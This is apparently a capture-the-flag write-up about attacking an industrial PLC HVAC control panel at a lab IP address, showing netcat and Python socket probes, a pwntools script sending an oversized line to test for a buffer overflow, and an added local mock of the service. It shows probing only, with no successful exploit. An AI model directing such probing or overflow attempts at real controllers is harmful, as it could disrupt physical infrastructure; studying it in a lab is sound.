DESCRIPTION
You have found a programmable logic controller's (PLC's) IP address. Can you manage to get access? I've heard a lot of stories that there are very critical vulnerabilities and they shouldn't be too hard to exploit.
QUESTION
You found a very interesting IP address. Looks like an access panel to some logic controller. Try to break its security.
10.12.32.132
SOLUTION
```shell
# nc 10.12.32.132 63513
*****************************************
Industrial PLC - HVAC Control Panel
Authorized access only!
*****************************************
-> Type 'help' to see commands
-> To quit just type 'quit'.
help
Not permitted (command access disabled) - log in via physical console: . 'help' .
^C
```
```python
import socket
import time

def sends(bytez):
    # Open a fresh connection, read the banner, send one line and
    # print everything the service returns until it closes the socket.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.12.32.132", 63513))
    data = s.recv(1024)            # banner
    #print("Received:", repr(data))
    time.sleep(0.1)
    s.sendall(bytez)
    s.shutdown(socket.SHUT_WR)     # signal end of input, then read the reply
    while 1:
        data = s.recv(1024)
        if data == b"":
            break
        print("->", repr(data))
    print("Connection closed.")
    s.close()

sends(bytes([69])+b"\r\n")         # sends "E\r\n"
```
Maximum number of bytes it returns on one line: 2048 (maybe a buffer overflow???)
If you send "A"*2049, it simply says "A"*2048 not permitted and on the next line "A"*1 not permitted.
```shell
pip3 install pwnlib
```
```python
#!/usr/local/bin/python3
from pwn import *

r = remote('10.12.32.132', 63513)
a = "A"*2050 + "\n"
r.send(a.encode("utf-8"))   # oversized line; the service reports it back in 2048-byte chunks
r.interactive()
```
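To exercise a client against the behaviour observed above without touching a live controller, here is an added local mock of the console service (not part of the original writeup) that reproduces the banner, the "Not permitted" echo and the 2048-byte chunking, plus a probe helper with a timeout. That the chunking comes from a fixed 2048-byte read buffer is an assumption made for the mock, not something the challenge confirms; the host/port and the `deny_lines`, `probe` and `run_local_demo` names are mine.

```python
import socket
import socketserver
import threading

CHUNK = 2048  # ASSUMPTION: the 2048-byte limit seen above is a fixed read-buffer size
BANNER = (b"*****************************************\r\nIndustrial PLC - HVAC Control Panel\r\n"
          b"Authorized access only!\r\n*****************************************\r\n"
          b"-> Type 'help' to see commands\r\n-> To quit just type 'quit'.\r\n")

def deny_lines(payload: bytes) -> list:
    """Build the reply the console gave: one 'Not permitted' line per 2048-byte chunk."""
    text = payload.rstrip(b"\r\n")
    chunks = [text[i:i + CHUNK] for i in range(0, len(text), CHUNK)] or [b""]
    return [b"Not permitted (command access disabled) - log in via physical console: . '"
            + c + b"' .\r\n" for c in chunks]

class MockPLCHandler(socketserver.BaseRequestHandler):
    def handle(self):  # banner, read one line with bounded recv() calls, answer, close
        self.request.sendall(BANNER)
        data = b""
        while b"\n" not in data:
            part = self.request.recv(CHUNK)
            if not part:
                break
            data += part
        for line in deny_lines(data):
            self.request.sendall(line)

def start_mock():
    srv = socketserver.TCPServer(("127.0.0.1", 0), MockPLCHandler)  # port 0: any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]

def probe(host: str, port: int, payload: bytes, timeout: float = 2.0) -> list:
    # Read the banner, send one line, then collect reply lines until the peer closes.
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(4096)               # banner
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while part := s.recv(4096):
            out += part
    return out.splitlines()

def run_local_demo() -> list:
    # Constructed input: the same 2049-byte "A" line discussed above, against the local mock.
    srv, port = start_mock()
    try:
        return probe("127.0.0.1", port, b"A" * 2049 + b"\n")
    finally:
        srv.shutdown(); srv.server_close()
```

Running `run_local_demo()` returns two reply lines, one quoting 2048 "A"s and one quoting a single "A", matching the split seen on the real service.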